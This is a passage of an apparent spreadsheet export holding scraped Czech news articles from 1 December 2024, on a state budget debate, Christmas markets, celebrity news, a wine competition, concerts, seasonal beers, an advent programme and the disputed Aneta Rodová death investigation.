Hrnčíř. A zaměřil se i na chybnou energetickou politiku vlády. „Domácnosti platí OZE v maximální výši, to zdražuje domácnostem a firmám výdaje, to chci v rozpočtu státu změnit,“ řekl Hrnčíř. Zaměřil se i na přetahovanou obcí, krajů a státu o to, kdo bude nadále platit nepedagogické pracovníky ve školství. „Dvacet let se neřešily kraje a ty peníze, které tam tekly před dvaceti lety, to už teď vůbec neodpovídá realitě. Nejsem si jistý, jestli se mají platby za nepedagogické pracovníky hodit na kraje a obce. Odjakživa se platili z rozpočtu ministerstva,“ řekl Hrnčíř s tím, že spor nastal jen proto, že vláda „dělá kejkle“. „Oni jsou bití jen proto, že tato vláda v rozpočtu dělá takové kejkle. Vláda přestala dávat do této kapitoly peníze a začala tvrdit, že to mají platit zřizovatelé,“ pohoršil se Jan Hrnčíř. Ekonomka Horská se pozastavila nad tím, že vláda schytává kritiku za to, že dělá reformy, a když je nedělá, schytává kritiku také. „Vláda je kritizovaná, že nedělá reformy, které by dělat měla. A když dělá alespoň nějaké kroky, tak je kritizovaná, že je dělá. Za mě by mělo platit, že pokud rozhoduji, měl bych to také platit. A to platí u obcí a nepedagogických pracovníků. Ti ani nevědí, kolik jich je zaměstnáváno. Rozhoduje, ale pak platím z vlastního rozpočtu,“ myslí si Horská. Dluhová brzda je v zákoně stanovená v České republice na 55 procent DPH. Nyní jsme na 45 %. „Dluhy se tvoří v minulosti, nikoliv v aktuálním období. Za této vlády se veřejné zadlužení zvýší o 5 %, za minulé vlády o 9 %,“ řekla Horská, přičemž minulé období výrazně ovlivnila epidemie covidu a proticovidová opatření. „Dluh roste ke čtyřem bilionům korun, nárůst dluhu není tak agresivní, konsolidaci tu máme. Nárůst dluhu zpomaluje,“ zkonstatovala ekonomka. Pro Jana Hrnčíře je zásadní hospodářský růst. „Musíme se zaměřit na hospodářský růst a ten tu s touto vládou není,“ řekl Hrnčíř a uvedl, že ČR je ve složité situaci. „Naše ekonomika je ve složité situaci, když funguje prakticky jen jako subdodavatel,“ dodal. Zkritizoval také takzvaný Green Deal, zelenou politiku Evropské unie , která chce postupně do roku 2050 udělat z členských států bezemisní území. „ Evropská unie si zavedla absurdní cíle zeleného údělu. Těmito cíli si zničíme průmysl. Budeme se orientovat na inovativní ekonomiku, a to podle mě nebude fungovat,“ zhodnotil klíčovou politiku EU Hrnčíř. A zpochybnil i vládní daňovou politiku. „Vláda rezignovala na hospodářský růst a plošně zvýšila daně. Snížení schodku je přesto daleko nižší, než kolik nově vybrala na daních,“ uvedl poslanec SPD a předseda rozpočtového výboru Poslanecké sněmovny . A s tím ekonomka Horská ne zcela souhlasila. „V některých oblastech se daně zvyšovaly. Ale když se podíváte na celkovou statistiku, tak zjistíte, že objem vybraných daní mírně klesl,“ řekla. A zapochybovala i o politice oživení hospodářství. „Pouhé oživení růstu české ekonomiky by strukturální schodek nesnížilo,“ zkonstatovala. Podle ní nestačí jen zefektivnit výběr daní a nastartovat ekonomický růst. „Musíme sahat do výdajových oblastí. A tam se ve Sněmovně neshodnete. Opozice zpochybňuje reformy. Část společnosti věří, že stačí najít nějaký růst a zefektivnit výběr daní. Ale to by nefungovalo. Bez reforem se dluh bude stále zvyšovat,“ řekla z pozice členky NERV. Jan Hrnčíř se pustil do kritiky vládních kroků. „Vláda slibovala snižování schodku o jedno procento ročně, ale ani to nesplnila. Zároveň vláda zmrzačila důchodový systém. Není ani jasné, jak to bude za třicet let vypadat, v jaké formě bude třeba robotizace,“ popsal své pochybnosti poslanec za SPD . Vyjádřil se i k dluhové brzdě, kterou máme ukotvenou v zákoně. „Dluhová brzda je dobrá věc. Ovšem v Německu s tím mají problém. Ale ti mají brzdu stanovenou na velmi nízké hranici. Tak je brzda zabrzdí, pokud by chtěli nakopnout při krizi ekonomiku, nemůžou,“ zhodnotil naše západní sousedy. Kvůli dluhové brzdě padla i tamní vláda Olafa Scholze . Kancléř Olaf Scholz požadoval dluhovou brzdu dočasně zvýšit, ale to koaliční partneři odmítli, načež se tamní vláda rozpadla, a na začátku příštího roku tak v Německu proběhnou předčasné volby. Ale Jan Hrnčíř pokračoval v kanonádě vůči vládnímu kabinetu České republiky . „Stát bobtná, byrokracie roste, digitalizace selhala, tato vláda to, co slibovala, nesplnila,“ vypočítával selhání vlády Hrnčíř a dodal, co jej v poslední době udivilo. „Je směšné, že Fiala tvrdí, že 93 % toho, co slíbili, mají splněno, nechápu to,“ zhodnotil. Zároveň pochválil SPD, že před čtyřmi lety spolu s ODS a ANO zrušili superhrubou mzdu. Podle Hrnčíře tím lidem zůstalo víc v peněženkách. V tom mu ovšem ekonomka Horská oponovala. „ Mezinárodní měnový fond zmiňuje zrušení superhrubé mzdy s tím, že může za problémy českého rozpočtu,“ poznamenala Horská. „Máme podprůměrné výběry majetkových a spotřebních daní,“ poznamenala Horská. Podle NERV by vláda měla razantně zvýšit daň z nemovitostí, abychom se přiblížili k západním standardům, kde jsou násobně vyšší. Došlo i na zdanění neřestí, jako je kouření, alkohol nebo nezdravé potraviny. „Spotřební zdanění má dopad i na zdraví lidí, s tím bychom měli pohnout,“ řekla Horská. S tím měl Jan Hrnčíř určité pochybnosti. „I když se daně z neřestí zvyšují, výběr klesá. Lidé se za nákupy přesouvají do zahraničí. Češi nakupují cigarety v Polsku , poláci tedy mají vyšší výběr daní, ale v České republice se pak platí následky kouření v českém zdravotnictví a na český účet,“ poukazuje na nepoměr Hrnčíř. Zdroje: https://ct24.ceskatelevize.cz/#live Přidejte si PL do svých oblíbených zdrojů na Google Zprávy . Děkujeme. Foto: Screen: CNN Prima News Popisek: Ekonomka Helena Horská v Partii. Rubrika transition_slide Monitor</t>
  </si>
  <si>
    <t>20241201_54_3478468781_9d91b341b019aee1555b.html</t>
  </si>
  <si>
    <t>9d91b341b019aee1555b</t>
  </si>
  <si>
    <t>Litoměřičtí rozsvítili vánoční strom, pili svařák za 65, jedli trdelník za 100</t>
  </si>
  <si>
    <t>Litoměřičtí rozsvítili vánoční strom, pili svařák za 65, jedli trdelník za 100 Svařené víno bylo na třech stáncích pořádajících Městských kulturních zařízení za rovných 65 korun. Podobně na dalších soukromých stáncích stály i alko a nealko varianty nápoje na zahřátí jako horké jablko, grog, medovina, punč a podobně, na sto potom vyšlo bombardino. Trdelník byl také za sto korun. Klobása vyšla podle druhu na 100-120 korun, párek v rohlíku nebo na tácku stál 40-50 korun, horká kukuřice 70. Na pořádné zasycení lákaly krkonošský bramborák se zelím za 120 a různé typy langošů od 100 až do 180 korun. Povození dětí na jednom nebo druhém kolotoči vyšlo rodiče na 50 korun. Na Mírové náměstí v Litoměřicích přivezli 25. listopadu 2024 vánoční strom. | Video: Deník/Karel Pech Autor: Jaroslav Balvín Autor Jaroslav Balvín</t>
  </si>
  <si>
    <t>6370</t>
  </si>
  <si>
    <t>4150</t>
  </si>
  <si>
    <t>20241201_55_3478310276_8880ccec43b75d9d0110.html</t>
  </si>
  <si>
    <t>8880ccec43b75d9d0110</t>
  </si>
  <si>
    <t>Vendula Pizingerová bez muže na Zanzibaru: Poprask kvůli plavkám</t>
  </si>
  <si>
    <t>Vendula Pizingerová bez muže na Zanzibaru : Poprask kvůli plavkám Před mrazivým počasím v Česku utekla Vendula Pizingerová s mladším synem Pepíčkem na Zanzibar . V tradičním rezortu si užívají všeho, co jim skýtá, a vyráží na výlety. „Jedna z nejkrásnějších dovolených! Ještě nás čeká pár výletů. Ani jsem to nečekala! Zanzibar je boží, skvělej africkej hotel! Žádnej mramor ani křišťál! Jen čistá Afrika ,“ pochvaluje si Vendula . Na dovolenou vyrazila se synem Josífkem, s kamarádkou a jejím potomkem. Došlo i na tzv. plovoucí snídani, která se podává do bazénu. Prezidentka nadačního fondu Kapka naděje měla co dělat, aby proutěný koš udržela na hladině, protože děti ho podplouvaly a dováděly okolo. Nechybí procházky po dlouhých písčitých plážích. „Žena a pivo ,“ má jasno Pizingerová. Ale víc než pivo v ruce zaujaly její sexy krajkové šaty. „Plavky a krajková sukně na koupání,“ vysvětlila blondýnka. Manžel Josef zůstal doma, toho spíš užije na výlety do drsné přírody a adrenalin. Stejně tak Vendulin starší syn Jakub (19). Markéta Reinischová, Daniel Kristl Vendula Pizingerová pod ostrou palbou okolí: Trefují se do mého věku a mladšího manžela! instagram.com Instagram Blesk:Martin Hykl/ CZECH NEWS CENTER CNC / Martin Hykl M. Hykl Instagram, archiv Blesk:CNC / Pavel Machan profimedia.cz Blesk:FOTO: Jiří Koťátko / CNC Blesk:CNC/Martin Hykl Blesk:Foto CNC: Marek Pátek instagram.com J. Poláček , archiv Blesku herminapress.cz Profimedia.cz profimedia.com Astratex.cz Blesk:Renata Matějková Blesk:David Kundrát/ Czech News Center instagram Vendula Pizingerová na Zanzibaru Vendula Pizingerová Knížku vyprovodily do světa (zleva) Vendula Pizingerová , Petra Řehořková , spoluautorky Karolína Ponocná Kamberská a Dita Pichlerová, Jana Paulová a moderátorka křtu. Monika Absolonová a Vendula Pizingerová Vendula Pizingerová ukázala figuru jen v prádle. Vendula Pizingerová se pochlubila snímky v plavkách. Pizingerová Vendula Pizingerová se synem Pepíčkem Vendula Pizingerová s manželem Josefem Překvapení pro Vendulu Pizingerovou Vendula Pizingerová se synem Jakubem na Slavících Vendula Pizingerová se svým dospělým synem Jakubem Svobodou na Slavících 2023 Vendula Pizingerová a dvojitá oslava narozenin Vendula Pizingerová měla z hub velkou radost. Vendula s manželem a synem na dovolené Eva Decastelo a Vendula Pizingerová Manžel a syn Venduly Pizingerové se chystali skočit do řeky nazí. Vendula v Namibii Manželé v Africe Vendula Pizingerová oslavila na módní přehlídce 60. Slavily se i narozeniny Venduly Pizingerové. Vendula Pizingerová po přehlídce Deadia Cosmetics : Vendula Pizingerová Vendua Pizingerová v Turecku Vendula Pizingerová v Turecku Vendula Pizingerová se svým manželem Josefem Pizingerem. Vendula Pizingerová dělá v posledních dnech jeden průšvih za druhým. Miluše Bittnerová a Vendula Pizingerová Vendula Pizingerová , Biser Arichtev a jeho žena Veronika Vendula Pizingerová a Zorka Hejdová Vendula Pizingerová a Monika Absolonová na plese na Žofíně Vendula Pizingerová na plese na Žofíně Autor: lara Autor person lara Rubrika transition_slide České celebrity</t>
  </si>
  <si>
    <t>453930</t>
  </si>
  <si>
    <t>20241201_56_3478311121_d4a06f3d4ffaf9b7c79f.html</t>
  </si>
  <si>
    <t>d4a06f3d4ffaf9b7c79f</t>
  </si>
  <si>
    <t>V soutěži O pohár Karla IV. triumfovaly produkty Vinařství ČZU</t>
  </si>
  <si>
    <t>V soutěži O pohár Karla IV. triumfovaly produkty Vinařství ČZU Mistři vinařského řemesla se utkali v mezinárodní soutěži vín O pohár Karla IV. , jejíž stoletou tradici oživil před pěti lety Cech českých vinařů, z. s. Prestižní ocenění za Ryzlink rýnský 2022 a Labín 2022 zde získalo Vinařství ČZU v Chloumku u Mělníka . Slavnostní vyhlášení výsledků proběhlo v sobotu 30. listopadu 2024 v klášteře svaté Voršilky v Kutné Hoře . Při té příležitosti se konala degustace všech soutěžních vín pro veřejnost. Správce Vinařství ČZU Štěpán Weitosch (na snímku vpravo) při slavnostním předávání ocenění „Pro jubilejní pátý ročník obnovené mezinárodní soutěže vín 1924–2024 a vzhledem k jejím stým narozeninám jsme se rozhodli otevřít soutěž pouze pro královské odrůdy Ryzlink rýnský a Pinot noir. To se ukázalo jako šťastné rozhodnutí,“ říká předseda Cechu českých vinařů Stanislav Rudolfský. V konkurenci 114 soutěžních vzorků ze šesti států, z nichž 72 zastupoval Ryzlink rýnský a 41 Pinot noir, se zrodil šampion Pinot noir 2022, produkt Vinných sklepů Kutná Hora . O vynikající kvalitě soutěžních vzorků svědčí i počet udělených medailí: 12 velkých zlatých a 57 zlatých. Skvělým výsledkem se může pochlubit Vinařství ČZU v Chloumku u Mělníka , které si odnáší ocenění ve dvou kategoriích: Nejlepší Ryzlink rýnský za Ryzlink rýnský 2022 a Nejlepší klaret/rose za Labín 2022. „Každého ocenění, které naše vína získají, si nesmírně vážím. Je to pro mě to nejhodnotnější potvrzení, že svoji práci dělám dobře. A také ta nejsilnější motivace,“ říká Ing. Štěpán Weitosch, správce Vinařství ČZU v Chloumku. Hodnocení vín proběhlo 13. listopadu v Kutné Hoře pod vedením národní sommelierky Kláry Kollárové Dvanáct „velkých zlatých“ medailistů a šampioni: Ryzlink rýnský Česká zemědělská univerzita v Praze 2022 Rulandské modré Vinné sklepy Kutná Hora , s.r.o. 2022 Ryzlink rýnský Školní statek Středočeského kraje , Hlavní 169, Lázně Toušeň 2019 RR Mitrberg Jindřich Kadrnka 2023 RR Liščí vrch Jindřich Kadrnka 2022 Ryzlink rýnský THAYA vinařství, spol. s r.o. 2022 Hochheimer Herrnberg Riesling B.wine/Weingut Künstler 2023 RR Staré Filip Mlýnek 2023 Rulandské modré Vinařství Mikulica 2022 RR Lusy Filip Mlýnek 2023 RR Jindřich IV Staré Jindřich Kadrnka 2023 Ryzlink rýnský Luděk Vondrák 2023 Ryzlink rýnský THAYA vinařství, spol. s r.o. 2022 Ryzlink rýnský Vladimír Tetur 2021 Rulandské modré Vinné sklepy Kutná Hora , s.r.o. 2022 OAK Rulandské modré Vladimír Tetur 2018 Z historie Mezinárodní vinařské soutěže Mezinárodní vinařské sympozium O pohár Karla IV. je spojeno s více než stoletou tradicí a záslužnou činností Výzkumné stanice vinařské v Karlštejně . Ta byla založena jako Státní pokusná vinice v Budňanech a jejím posláním byly výzkum, šlechtění, zkoušení odrůd, nové způsoby pěstování a výzkumně-pěstitelská činnost. V neposlední řadě také sloužila jako karanténní stanice pro odzkoušení odrůd introdukovaných ze zahraničí a pro vyhodnocení jejich vhodnosti pro pěstování v Čechách . Cech českých vinařů uvažoval o obnovení této soutěže již v roce 2016, kdy měla být součástí projektu Karel IV. – moudrý panovník a vinař při oslavách 700. výročí narození císaře a krále Karla IV. Soutěž se povedlo oživit až v roce 2019 při slavnostech stého výročí založení Výzkumné stanice vinařské Karlštejn. Podobné články Autor: Lenka Prokopová Autor person Lenka Prokopová Rubrika transition_slide Aktuálně</t>
  </si>
  <si>
    <t>238</t>
  </si>
  <si>
    <t>20241201_57_3478075943_93ddff03950a1afebdc3.html</t>
  </si>
  <si>
    <t>93ddff03950a1afebdc3</t>
  </si>
  <si>
    <t>Sál společenského domu v Kolíně zaplnili fanoušci punkové muziky</t>
  </si>
  <si>
    <t>Sál společenského domu v Kolíně zaplnili fanoušci punkové muziky V kolínském městském společenském domě v sobotu 30. listopadu večer již slušně zaplněný sál rozehřála ještě s Totálním nasazením personálně propojená skupina Dilema In Cinema, která svůj hudební set odpálila skladbou Igelitky. Nechyběly ani písničky In Flagranti či Svoboda není všechno, už některé z nich si fanoušci zpívali společně se zpěvákem a kytaristou P.P. Cvokem, došlo i na vtipnou Vedro jako v Tel Avivu . Sál společenského domu v Kolíně zaplnili fanoušci punkové muziky | Video: Zdeněk Hejduk Pokud do té doby bylo pod pódiem ještě nějaké místo, po krátké pauze na přestavění aparatury a výměně trička P.P. Cvoka, se na pódium vřítila slánská trojice Totální nasazení a všichni v sále se okamžitě roztančili a rozezpívali. Baskytarista a zpěvák Sváťa Šváb je hned v úvodu rozdováděl chytlavými písničkami Australská či Protidavová, pochopitelně musely zaznít hity jako Zloděj z Bagdádu , Činčila. Při skladbě Oceloví ptáci už nastalo v sále peklo. Na přídavkovou Kazoo or die si Šváb nasadil nástroj, který v Čechách proslavil on i Ivan Mládek , a opět se všichni rozpogovali. Sál společenského domu v Kolíně zaplnili fanoušci punkové muziky | Video: Zdeněk Hejduk Závěr mini festivalu obstarala další letitá kapela S.P.S., která hned v první části svého setu rozezpívala publikum hymnou všech pankáčů Máma, při jedné protikomunistické skladbě vypadl na pódiu poprvé v novodobé historii společenského domu proud, to když do jedné z elektrických rozdvojek nalil někdo z fanoušků pod pódiem pivo a ochrana elektřinu vypnula. Po jejich výměnách pokračoval koncert zdárně dál. Končilo se přídavkovým dalším punkovým vyznáním Adios, to už na pódiu křepčily nejen přítomné děti, ale i dvě fanynky, ještě před tím muzikanti sáhli k osobité verzi ruské skladby Partyzán. Na závěr už zbývalo jen společné focení včetně muzikantů obou kapel, kterým tímto společné turné skončilo. Autor: Zdeněk Hejduk Autor Zdeněk Hejduk Rubrika transition_slide Volný čas</t>
  </si>
  <si>
    <t>5300</t>
  </si>
  <si>
    <t>20241201_58_3477968789_fce7626e0dfcb66cb0fd.html</t>
  </si>
  <si>
    <t>fce7626e0dfcb66cb0fd</t>
  </si>
  <si>
    <t>Bernard uvařil pro letošní svátky dva pivní speciály</t>
  </si>
  <si>
    <t>Bernard uvařil pro letošní svátky dva pivní speciály Kdo Bar Community Awards obdrží, se dozvíme 20. listopadu během slavnostního vyhlášení, jež se uskuteční v brněnském vzdělávacím centru CBA Abzac. Budete u toho s námi? Pozvánku obdržíte v nejbližších dnech. registrace Registrací získáte zdarma přístup do archivu článků starších jednoho roku. Jméno * Opakujte heslo * Souhlas Vyplněním uvedených polí a kliknutím na „registrovat“ udělujete AtBars Spirit, s. r. o., souhlas se zpracováním osobních údajů, jež bude provedeno dle platné legislativy. Automaticky se tak stanete odběratelem newsletteru, z nějž se ale můžete kdykoliv odhlásit. Uživatelské jméno nebo e-mail If you are a human and are seeing this field, please leave it blank. Fields marked with an * are required jméno e-mail Kolik je třináct mínus 6? Vyplněním uvedených polí a kliknutím na „přihlásit“ udělujete AtBars Spirit, s.r.o., souhlas se zpracováním osobních údajů, jež bude provedeno dle platné legislativy. Bernard uvařil pro letošní svátky dva pivní speciály 01.12.2024 AtBars Rodinný pivovar Bernard letos připravil pro sváteční období hned dvě piva – polotmavý Adventní speciál a limitovanou edici Ležáku s chmelem z Vysočiny. Oba speciální ležáky budou k mání od prvního adventního týdne v podnicích s čepovaným pivem Bernard. Adventní speciál Bernard je polotmavá třináctka uvařená z českého, bavorského, karamelového a čokoládového sladu. Vyznačuje se tóny karamelu a sladu, má příjemnou chuť a vyváženou hořkost, kterou zajišťuje kombinace několika druhů chmele. Obsah alkoholu činí 5,6 %, hořkost dosahuje 32 IBU. K dostání bude výhradně čepovaný, a to ve smluvních hospodách a restauracích humpoleckého pivovaru. Zajímavostí druhého speciálu je chmel, který vyrostl v netypické lokaci – na Vysočině. Pochází z chmelnice, jež byla založena teprve vloni na svahu za Humpolcem , a to v nadmořské výšce 560 m. Rodinný pivovar Bernard na ní napoprvé vypěstoval a sklidil úrodu ze 144 rostlin šesti odrůd chmele. „Chmel z naší chmelnice je plnohodnotný, aromatický a pivo z něj lidem chutná. Navazuje tak na tradici, kdy jsem chmel do speciálu pěstoval několik let jen doma na zahradě,“ objasňuje vrchní sládek a generální ředitel pivovaru Josef Vávra. Ležák s chmelem z Vysočiny je jedenáctka s obsahem alkoholu 4,7 % a hořkostí 38 IBU. Na rozdíl od adventního piva z Humpolce bude k mání i v láhvích, ale jen ve značkových prodejnách pivovaru. Autor: Bára Urbanová Autor person Bára Urbanová Rubrika transition_slide zaznamenáno</t>
  </si>
  <si>
    <t>20241201_59_3477968129_7737bbf5e6ca204217e7.html</t>
  </si>
  <si>
    <t>7737bbf5e6ca204217e7</t>
  </si>
  <si>
    <t>Nenechte si ujít bohatý adventní program v Rožnově pod Radhoštěm</t>
  </si>
  <si>
    <t>Nenechte si ujít bohatý adventní program v Rožnově pod Radhoštěm Přijďte si užít adventní atmosféru do Rožnova pod Radhoštěm , kde na vás čeká bohatý kulturní program nejen na Masarykově náměstí. Jména interpretů jako Karel Zich Revival, Thom Artway , Olga Lounová , Bára Poláková, Elvis Presley Revival Band nebo vánoční koncert Zbyňka Ternera či Vánoce na modrých houslích Pavla Šporcla jsou zárukou pohodové předvánoční atmosféry. Tisková zpráva č. 131/2024 ze dne 29. 11. 2024 Adventní program odstartovalo v pátek 29. listopadu rozsvícení vánočního stromu na Masarykově náměstí. „Letošní vánoční strom pochází z místní části Rožnova – Tylovic. Jedná se o jedli ojíněnou, která je vysoká 13 metrů. Vánoční strom je ozdoben na špici LED světelnou hvězdou, zdobí jej 250 metrů světelného řetězu, 25 ks LED rampouchů a 14 ks Flasch LED žárovek,“ popsal letošní vánoční strom místostarosta Tomáš Gross a dodal: „Letos je také nově nazdobený hudební altán v městském parku pro zpříjemnění vánoční atmosféry pro všechny, kteří parkem procházejí.“ Na Masarykově náměstí je vždy v pondělí, středu a pátek od 17 hodin naplánován bohatý hudební program. „V pondělí 2. prosince nám zahraje Karel Zich Revival, ve středu 4. prosince Thom Artway a v pátek 6. prosince Bára Poláková,“ vyjmenoval místostarosta Tomáš Gross s tím, že následující týden v pondělí 9. prosince vystoupí Elvis Presley Revival Band. Ve středu 11. prosince se Rožnov připojí k tradiční akci Česko zpívá koledy tentokrát s cimbálovou muzikou Veselky a v pátek 13. prosince vystoupí Blue Cimbal. Třetí adventní týden odstartuje v pondělí 16. prosince šestičlenná kapela mladých a zapálených muzikantů z okolí Rožnova Conchord, ve středu 18. prosince kapela z Dolního Benešova Dolbend a v pátek 20. prosince vystoupí oblíbená Olga Lounová . Program na Masarykově náměstí zakončí ve středu 25. prosince koledy v podání dechové hudby Rožnovanka. „Připraveny jsou také čtyři adventní koncerty žáků ZUŠ Rožnov , které si můžete vždy v neděli poslechnout v kostele Všech svatých,“ uvedl místostarosta Gross. Návštěvníci si mohou užít na Masarykově náměstí od čtvrtku 5. do soboty 7. prosince Mikulášský festival jídla. Ochutnat mohou poctivý hovězí guláš, klobásy, tortilly, zeláky, burgery, ale i frgály, koláčky nebo si koupit domácí cukroví. K vyzkoušení bude také čerstvé a na místě dělané sushi, ale i autentická egyptská jídla. Nabídku nápojů doplní domácí minipivovar s neobyčejnými druhy piva a limonád. Bohatý program je také připraven ve Valašském muzeu v přírodě, ať už ve čtvrtek 5. prosince Mikulášský podvečer, v sobotu 7. prosince Večer při svíčkách nebo v sobotu 14. prosince se můžete svézt Vánočním expresem na Valašský jarmark, který bude probíhat i v neděli 15. prosince. Ve čtvrtek 26. prosince si můžete užít Štěpánskou koledu. „Pro všechny, kteří se budou chtít mezi svátky projít nabízíme jako tip na vánoční vycházku návštěvu Jurkovičovy rozhledny, která bude otevřena od 27. prosince 2024 do 1. ledna 2025 v době od 10 do 16 hodin a z Masarykova náměstí můžete být za 45 minut na rozhledně a užít si pohodový výhled do valašské krajiny z výšky více než 31 metrů,“ uzavřel místostarosta Gross. Zpracovala: Mgr. Adéla Kousalová Tisková mluvčí MěÚ Rožnov pod Radhoštěm T: 571 661 137 M: 603 839 072 Rozsvícení vánočního stromu Rozsvícení vánočního stromu v Rožnově pod Radhoštěm .JPG Program pro děti na Masarykově náměstí před rozsvícením vánočního stromu v Rožnově .JPG Autor: as4u.cz, s.r.o. || | adela.kousalova</t>
  </si>
  <si>
    <t>20241201_6_3484041111_1f3507141687c1066e40.html</t>
  </si>
  <si>
    <t>1f3507141687c1066e40</t>
  </si>
  <si>
    <t>I po 10 letech na mě útočí! stěžuje si matka Anety na video, které natočila policie s Josefem Marešem</t>
  </si>
  <si>
    <t>I po 10 letech na mě útočí! stěžuje si matka Anety na video, které natočila policie s Josefem Marešem Případ Anety Rodové, jedné z nejkontroverznějších údajných sebevražd v Česku, znovu vyvolává silné emoce. Na vlnu zájmu, kterou rozpoutal nový film inspirovaný tímto příběhem, reagovala policie zveřejněním 22minutového videa na svém oficiálním YouTube kanálu. Video, v němž bývalý šéf pražské mordparty Josef Mareš shrnuje fakta o případu, však místo uklidnění situace přineslo další kontroverze. Matka Anety, Anna Rodová se proti jeho obsahu ostře ohradili, zatímco veřejnost zůstává rozpolcená. „Nemám klid, celý den brečím,“ napsala Anna Rodová v reakci na video. „I po deseti letech na mě útočí policie. Proč se k tomu vyjadřuje bývalý zaměstnanec, který dnes píše detektivky? Proč za policii nemluví současný šéf nebo mluvčí?“ ptá se. Rodová vyjadřuje frustraci nad obsahem videa, které podle ní ignoruje klíčové nedostatky v původním vyšetřování a přináší pouze polovičaté informace. „ Josef Mareš šéfoval 1. oddělení pražské kriminálky a před soud dostal desítky vrahů. Nebývá zvykem, aby se veřejně vyjadřoval ke spekulacím. Případ Anety Rodové se díky novému filmovému zpracování dostal opět do povědomí veřejnosti a ačkoliv je více než zřejmé, že se jedná o filmovou adaptaci a nikoliv popis reality, tak ale chceme divákům nabídnout i pohled očima vyšetřovatelů, patologů a soudců,“ napsala policie k videu. KRIMI Sledovat další díly na iDNES.tv Josef Mareš ve videu vzpomíná, že případ byl od počátku vyšetřován jako podezřelé úmrtí a že pražská kriminálka provedla v roce 2016 „nadstandardní úkony“, například ztotožnění svědků z Coco Baru a nalezení taxikáře, který Anetu a její přátele vezl domů. Podle Rodové však policie k těmto informacím dospěla až díky jejím podnětům. „To všechno už věděla média díky mým upozorněním. Od roku 2015 jsem na tyto svědky neustále upozorňovala a prosila policii, aby je vyslechli. Vlastní iniciativu jsem u policie nikdy nezaznamenala,“ říká Rodová. Kritiku vyvolává i otázka Anetina srdce, které bylo po pitvě odstraněno a později standardně zlikvidováno. Mareš k tomu uvedl: „Srdce bylo odebráno za účelem detailnějšího zkoumání, což je běžná praxe. Bohužel patolog tuto skutečnost neoznámil dalšímu lékaři, což bylo chybou v komunikaci, ale jinak byl postup správný.“ Rodová s tím však nesouhlasí. „Kde jsou další vzorky? Proč se to vůbec stalo? Jak může být něco takového běžná praxe?“ ptá se a dodává, že otázky kolem pitvy jen přidávají k její nedůvěře vůči policii. Slavnostní premiéra filmu Aneta a rozhovor s matkou Anety Mareš se také vyjádřil k otázce zdravotní péče, která byla Anetě poskytnuta. Podle něj zdravotníci udělali maximum a použití přístroje Lucas, který je při bodných ranách kontroverzní, bylo adekvátní situaci. Vysvětlil také, že odebrání Anetina srdce během pitvy bylo standardním postupem, který měl umožnit podrobnější zkoumání. Likvidace tohoto biologického materiálu byla podle něj legální a běžná praxe. Mareš uznává, že některé procesy mohly být lépe komunikovány, ale odmítá jakékoli zásadní pochybení na straně policie či zdravotníků. Ve zmínil, že zdravotníkům měla rodina spíše poděkovat, než se s nimi soudit. S tím zásadně nesouhlasí paní Rodová, podle které nepostupovali správně. „Za co mám děkovat? Že mou dceru převezli do nemocnice za tři hodiny? Že použili přístroj, který se při bodných ranách nesmí používat?“ Slavnostní premiéra filmu Aneta a rozhovor s novinářem Petrem Konečným Ke zveřejněnému videu se vyjádřil také autor námětu filmu Petr Konečný (šéfredaktor webu expres.cz - pozn redakce) „ Film odemkl policii ústa, ale to, co říkají, vyvolává spíše další otázky. Video se zaměřuje jen na rok 2016, ale úplně ignoruje první vyšetřování z roku 2014, které bylo už tehdy kritizováno za závažné nedostatky,“ říká Konečný. Podle Konečného Mareš ve videu nepřináší žádná nová zjištění. „ Mareš shrnuje jen zlomek toho, co zazní ve filmu. Divák ve filmu uvidí analýzu spisů, znaleckých posudků a dalších zdrojů. Ve videu se ale mluví jen o tom, co už dávno víme,“ dodává, že video spíše zamotává situaci, než aby ji objasňovalo. Matka Anety Anna Rodová s novinářem Petrem Konečným. „Je možné, že pan Mareš během rozhovoru řekl mnohem víc, ale pokud ano, zůstalo to na střihačském stole,“ říká. Podle něj se Mareš ve videu zcela vyhýbá hlavnímu závěru případu – sebevraždě pod vlivem toxické psychózy. „Zmiňuje, že Aneta měla v těle kokain a trochu alkoholu , ale zároveň tvrdí, že množství nebylo tak vysoké, aby neovládala své jednání. Tento argument však přímo popírá závěr policie, která tvrdí, že šlo o sebevraždu pod vlivem toxické psychózy, při níž člověk ztrácí kontakt s realitou. Co tedy bylo příčinou? Plánovaná sebevražda? Mareš zde nepřináší žádná nová fakta, spíše vyvolává staré otázky,“ dodává Konečný. Tvůrci dokumentu Aneta Anna Rodová upozorňuje i na rozporuplné informace týkající se výpovědí svědků. „ Mareš tvrdí, že Aneta věděla, co dělá, ale přitom ignoruje fakta o drogách, které dostávala od Ahmeda. Proč se neřeší, kdo drogy na místě poskytoval? Jak mohou být svědci, kteří byli pod vlivem, považováni za důvěryhodné?“ ptá se. Kritizuje také, že Mareš ve videu zdůrazňuje údajnou unavenost a smutek Anety po návratu z dovolené jako možný motiv sebevraždy, zatímco opomíjí výpovědi jejího přítele, který tvrdil, že s Anetou plánovali další schůzky. „Proč nebere v potaz fakta, která přímo odporují jeho interpretaci?“ Producent filmu Jiří Tuček pak zpochybňuje Marešova tvrzení týkající se krevních stop na místě činu. „Podle tiskového oddělení policie nebyl žádný objektivní důvod stírat krevní stopy, ale pan Mareš říká něco jiného. Pokud i po deseti letech přetrvávají takové rozpory, nelze se divit mamince Anety, že ztratila důvěru v policii,“ říká Tuček. „Pokud i po deseti letech stále nacházíme podobné rozpory, nelze se divit mamince Anety, že ztratila důvěru v policií. Obsáhlejší vyjádření k videu si však můžete poslechnout 6.12. po projekci filmu v Lucerně, kde kromě tvůrců filmu budou na debatě přítomny tvůrkyně Instacrime podcastu,“ dodal na závěr. Poslední snímek Aneta s její kamarádkou Anetou v baru. O několik hodin dívka umírá v jejím bytě po hádce s libanonským podnikatelem. Celý případ se tak stále nachází na tenké hranici mezi fakty, spekulacemi a chybami systému. Zatímco policie trvá na tom, že odvedla profesionální práci, a Mareš ve videu obhajuje závěry vyšetřování, Anna Rodová a tvůrci filmu poukazují na zjevné nedostatky a vyzývají k otevření případu. „Můj boj se systémem nekončí,“ uzavírá Rodová. „Stále zbývají právní možnosti, které jsem nevyčerpala. Dokud nebudou všechny otázky zodpovězeny a chyby napravena, nebudu mít klid.“ Fotogalerie 25 fotografií Poslední snímek Aneta s její kamarádkou Anetou v baru. O několik hodin dívka... Slavnostní premiéra filmu Aneta a rozhovor s novinářem Petrem Konečným Tvůrci dokumentu Aneta Režisér dokumentu Jiří Sádek . Policejni fotografie nože, kterým se měla Aneta ubodat do srdce. Slavnostní premiéra filmu Aneta a rozhovor s matkou Anety 